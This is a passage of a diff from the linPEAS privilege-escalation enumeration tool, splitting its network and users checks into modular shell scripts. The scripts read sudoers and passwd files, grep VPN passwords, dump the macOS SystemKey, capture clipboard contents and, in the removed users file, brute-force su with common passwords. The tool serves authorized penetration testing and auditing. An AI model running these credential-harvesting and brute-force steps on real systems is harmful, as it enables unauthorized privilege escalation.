+# Description: Enumerate macOS hardware ports
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $EXTRA_CHECKS, $MACPEAS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
+  print_2title "Hardware Ports"
+  networksetup -listallhardwareports
+  echo ""
+
+  print_2title "VLANs"
+  networksetup -listVLANs
+  echo ""
+
+  print_2title "Wifi Info"
+  networksetup -getinfo Wi-Fi
+  echo ""
+
+  print_2title "Check Enabled Proxies"
+  scutil --proxy
+  echo ""
+
+  print_2title "Wifi Proxy URL"
+  networksetup -getautoproxyurl Wi-Fi
+  echo ""
+  
+  print_2title "Wifi Web Proxy"
+  networksetup -getwebproxy Wi-Fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/11_Internet_access.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/11_Internet_access.sh
@@ -0,0 +1,24 @@
+# Title: Network Information - Internet access
+# ID: NT_Internet_access
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Check for internet access
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_dns, check_icmp, check_tcp_443, check_tcp_80, print_2title
+# Global Variables: $FAST, $TIMEOUT
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
+  print_2title "Internet Access?"
+  check_tcp_80 2>/dev/null &
+  check_tcp_443 2>/dev/null &
+  check_icmp 2>/dev/null &
+  check_dns 2>/dev/null &
+  wait
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/1_Network_interfaces.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/1_Network_interfaces.sh
@@ -0,0 +1,19 @@
+# Title: Network Information - Network interfaces
+# ID: NT_Network_interfaces
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Check network interfaces
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Interfaces"
+cat /etc/networks 2>/dev/null
+(ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null
+echo ""
--- a/linPEAS/builder/linpeas_parts/5_network_information/2_Hostname_hosts_dns.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/2_Hostname_hosts_dns.sh
@@ -0,0 +1,19 @@
+# Title: Network Information - Hostname, hosts and DNS
+# ID: NT_Hostname_hosts_dns
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get hostname, hosts and DNS
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, warn_exec
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Hostname, hosts and DNS"
+cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
+warn_exec dnsdomainname 2>/dev/null
+echo ""
--- a/linPEAS/builder/linpeas_parts/5_network_information/3_Network_neighbours.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/3_Network_neighbours.sh
@@ -0,0 +1,25 @@
+# Title: Network Information - Network neighbours
+# ID: NT_Network_neighbours
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Networks and neighbours
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $EXTRA_CHECKS, $MACPEAS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Networks and neighbours"
+  if [ "$MACPEAS" ]; then
+    netstat -rn 2>/dev/null
+  else
+    (route || ip n || cat /proc/net/route) 2>/dev/null
+  fi
+  (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/4_Open_ports.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/4_Open_ports.sh
@@ -0,0 +1,19 @@
+# Title: Network Information - Open ports
+# ID: NT_Open_ports
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Enumerate open ports
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Active Ports"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports"
+( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
+echo ""
--- a/linPEAS/builder/linpeas_parts/5_network_information/5_Macos_network_capabilities.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/5_Macos_network_capabilities.sh
@@ -0,0 +1,20 @@
+# Title: Network Information - MacOS network capabilities
+# ID: NT_Macos_network_capabilities
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: MacOS network Capabilities
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, warn_exec
+# Global Variables: $MACPEAS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$MACPEAS" ]; then
+  print_2title "Network Capabilities"
+  warn_exec system_profiler SPNetworkDataType
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/6_Macos_network_services.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/6_Macos_network_services.sh
@@ -0,0 +1,46 @@
+# Title: Network Information - MacOS Network Services
+# ID: NT_Macos_network_services
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Enumerate macos network services
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, warn_exec
+# Global Variables: $EXTRA_CHECKS, $MACPEAS
+# Initial Functions:
+# Generated Global Variables: $rmMgmt, $scrShrng, $flShrng, $rLgn, $rAE, $bmM
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$MACPEAS" ]; then
+  print_2title "Any MacOS Sharing Service Enabled?"
+  rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
+  scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
+  flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
+  rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
+  rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
+  bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
+  printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
+  echo ""
+  print_2title "VPN Creds"
+  system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password"  | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
+  echo ""
+  print_2title "Firewall status"
+  warn_exec system_profiler SPFirewallDataType
+  echo ""
+
+  if [ "$EXTRA_CHECKS" ]; then
+    print_2title "Bluetooth Info"
+    warn_exec system_profiler SPBluetoothDataType
+    echo ""
+
+    print_2title "Ethernet Info"
+    warn_exec system_profiler SPEthernetDataType
+    echo ""
+
+    print_2title "USB Info"
+    warn_exec system_profiler SPUSBDataType
+    echo ""
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/7_Tcpdump.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/7_Tcpdump.sh
@@ -0,0 +1,23 @@
+# Title: Network Information - Tcpdump
+# ID: NT_Tcpdump
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Can I sniff with tcpdump?
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_no, print_2title, print_info
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Can I sniff with tcpdump?"
+timeout 1 tcpdump >/dev/null 2>&1
+if [ $? -eq 124 ]; then #If 124, then timed out == It worked
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing"
+    echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/5_network_information/8_Iptables.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/8_Iptables.sh
@@ -0,0 +1,20 @@
+# Title: Network Information - Iptables
+# ID: NT_Iptables
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Enumerate iptables rules
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title
+# Global Variables: $EXTRA_CHECKS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Iptables rules"
+  (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/9_Inetdconf.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/9_Inetdconf.sh
@@ -0,0 +1,20 @@
+# Title: Network Information - Inetconf
+# ID: NT_Inetdconf
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Check content of /etc/inetd.conf & /etc/xinetd.conf
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title 
+# Global Variables: $EXTRA_CHECKS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
+  (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/6_users_information.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information.sh
@@ -1,232 +0,0 @@
-###########################################
-#----------) Users Information (----------#
-###########################################
-
-#-- UI) My user
-print_2title "My user"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users"
-(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
-echo ""
-
-if [ "$MACPEAS" ];then
-  print_2title "Current user Login and Logout hooks"
-  defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
-  echo ""
-
-  print_2title "All Login and Logout hooks"
-  defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
-  defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist
-  echo ""
-
-  print_2title "Keychains"
-  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
-  security list-keychains
-  echo ""
-
-  print_2title "SystemKey"
-  ls -l /var/db/SystemKey
-  if [ -r "/var/db/SystemKey" ]; then
-    echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},";
-    hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},";
-  fi
-  echo ""
-fi
-
-#-- UI) PGP keys?
-print_2title "Do I have PGP keys?"
-command -v gpg 2>/dev/null || echo_not_found "gpg"
-gpg --list-keys 2>/dev/null
-command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys"
-netpgpkeys --list-keys 2>/dev/null
-command -v netpgp 2>/dev/null || echo_not_found "netpgp"
-echo ""
-
-#-- UI) Clipboard and highlighted text
-if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then
-  print_2title "Clipboard or highlighted text?"
-  if [ "$(command -v xclip 2>/dev/null)" ]; then
-    echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
-    echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
-  elif [ "$(command -v xsel 2>/dev/null)" ]; then
-    echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
-    echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
-  elif [ "$(command -v pbpaste 2>/dev/null)" ]; then
-    echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
-  else echo_not_found "xsel and xclip"
-  fi
-  echo ""
-fi
-
-#-- UI) Sudo -l
-print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
-(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
-if [ "$PASSWORD" ]; then
-  (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null  || echo_not_found "sudo"
-fi
-( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null  || echo_not_found "/etc/sudoers"
-if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
-  echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-fi
-for filename in /etc/sudoers.d/*; do
-  if [ -r "$filename" ]; then
-    echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g"
-    grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g"
-  fi
-done
-echo ""
-
-#-- UI) Sudo tokens
-print_2title "Checking sudo tokens"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens"
-ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
-if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
-  echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g";
-
-  if [ "$(command -v gdb 2>/dev/null)" ]; then
-    echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
-  fi
-
-  if [ "$CURRENT_USER_PIVOT_PID" ]; then
-    echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g";
-  fi
-
-  if [ -f "$HOME/.sudo_as_admin_successful" ]; then
-    echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
-  fi
-
-  if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
-    echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g";
-    ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
-  fi
-
-else
-  echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
-
-fi
-echo ""
-
-#-- UI) Doas
-if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
-  print_2title "Checking doas.conf"
-  doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
-  if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
-    cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW},"
-  else echo_not_found "doas.conf"
-  fi
-  echo ""
-fi
-
-#-- UI) Pkexec policy
-print_2title "Checking Pkexec policy"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
-(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
-echo ""
-
-#-- UI) Superusers
-print_2title "Superusers"
-awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
-echo ""
-
-#-- UI) Users with console
-print_2title "Users with console"
-if [ "$MACPEAS" ]; then
-  dscl . list /Users | while read uname; do
-    ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
-    if grep -q "$ushell" /etc/shells; then #Shell user
-      dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-      echo ""
-    fi
-  done
-else
-  no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
-  unexpected_shells=""
-  printf "%s\n" "$no_shells" | while read f; do
-    if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
-      unexpected_shells="$f\n$unexpected_shells"
-    fi
-  done
-  grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-  if [ "$unexpected_shells" ]; then
-    printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
-    echo "Unexpected users with shells:"
-    printf "%s\n" "$unexpected_shells" | while read f; do
-      if [ "$f" ]; then
-        grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
-      fi
-    done
-  fi
-fi
-echo ""
-
-#-- UI) All users & groups
-print_2title "All users & groups"
-if [ "$MACPEAS" ]; then
-  dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
-else
-  cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
-fi
-echo ""
-
-#-- UI) Login now
-print_2title "Login now"
-(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-echo ""
-
-#-- UI) Last logons
-print_2title "Last logons"
-(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-echo ""
-
-#-- UI) Login info
-print_2title "Last time logon each user"
-lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-
-EXISTS_FINGER="$(command -v finger 2>/dev/null)"
-if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
-  dscl . list /Users | while read uname; do
-    ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
-    if grep -q "$ushell" /etc/shells; then #Shell user
-      finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-      echo ""
-    fi
-  done
-fi
-echo ""
-
-#-- UI) Password policy
-if [ "$EXTRA_CHECKS" ]; then
-  print_2title "Password policy"
-  grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
-  echo ""
-
-  if [ "$MACPEAS" ]; then
-    print_2title "Relevant last user info and user configs"
-    defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
-    echo ""
-
-    print_2title "Guest user status"
-    sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
-    sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
-    sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
-    echo ""
-  fi
-fi
-
-#-- UI) Brute su
-if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
-  print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
-  POSSIBE_SU_BRUTE=$(check_if_su_brute);
-  if [ "$POSSIBE_SU_BRUTE" ]; then
-    SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
-    printf "%s\n" "$SHELLUSERS" | while read u; do
-      echo "  Bruteforcing user $u..."
-      su_brute_user_num "$u" $PASSTRY
-    done
-  else
-    printf $GREEN"It's not possible to brute-force su.\n\n"$NC
-  fi
-else
-  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
-fi
-print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
--- a/linPEAS/builder/linpeas_parts/6_users_information/10_Pkexec.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/10_Pkexec.sh
@@ -0,0 +1,19 @@
+# Title: Users Information - Pkexec
+# ID: UG_Pkexec
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Check Pkexec policy
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables: $Groups, $groupsB, $groupsVB,$nosh_usrs, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Checking Pkexec policy"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
+(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/11_Superusers.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/11_Superusers.sh
@@ -0,0 +1,18 @@
+# Title: Users Information - Superusers
+# ID: UG_Superusers
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Superusers
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables:$knw_usrs ,$nosh_usrs,$sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Superusers"
+awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/12_Users_with_console.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/12_Users_with_console.sh
@@ -0,0 +1,44 @@
+# Title: Users Information - Users with console
+# ID: UG_Users_with_console
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Users with console
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $MACPEAS, $sh_usrs, $USER 
+# Initial Functions:
+# Generated Global Variables: $ushell, $no_shells, $unexpected_shells
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Users with console"
+if [ "$MACPEAS" ]; then
+  dscl . list /Users | while read un; do
+    ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
+    if grep -q "$ushell" /etc/shells; then #Shell user
+      dscl . -read "/Users/$un" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+      echo ""
+    fi
+  done
+else
+  no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
+  unexpected_shells=""
+  printf "%s\n" "$no_shells" | while read f; do
+    if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
+      unexpected_shells="$f\n$unexpected_shells"
+    fi
+  done
+  grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+  if [ "$unexpected_shells" ]; then
+    printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
+    echo "Unexpected users with shells:"
+    printf "%s\n" "$unexpected_shells" | while read f; do
+      if [ "$f" ]; then
